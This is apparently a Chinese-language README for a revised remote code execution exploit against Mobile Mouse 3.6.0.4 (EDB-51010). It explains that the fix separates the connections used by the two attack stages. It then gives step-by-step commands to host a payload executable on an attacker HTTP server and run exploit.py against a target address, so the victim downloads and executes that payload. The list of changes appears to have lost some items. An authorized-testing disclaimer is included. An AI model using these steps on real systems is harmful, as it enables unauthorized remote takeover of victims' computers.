这是已发布为 EDB-51010 的 Mobile Mouse 3.6.0.4 远程代码执行漏洞利用程序的修正版本。
原始漏洞利用程序虽然可以成功下载有效载荷,但由于两个阶段使用同一条 TCP 连接,可能无法执行该有效载荷。
此版本:
它还使用了 sendall()、正确转义的 Windows 路径、套接字超时和基本错误处理。
在有效载荷所在目录启动一个 HTTP 服务器:
python3 -m http.server 8080
运行漏洞利用程序:
python3 exploit.py \
--target 192.168.1.50 \
--lhost 192.168.1.10 \
--file payload.exe
本项目仅用于授权的安全测试和教育研究。未经明确许可,请勿将其用于针对任何系统。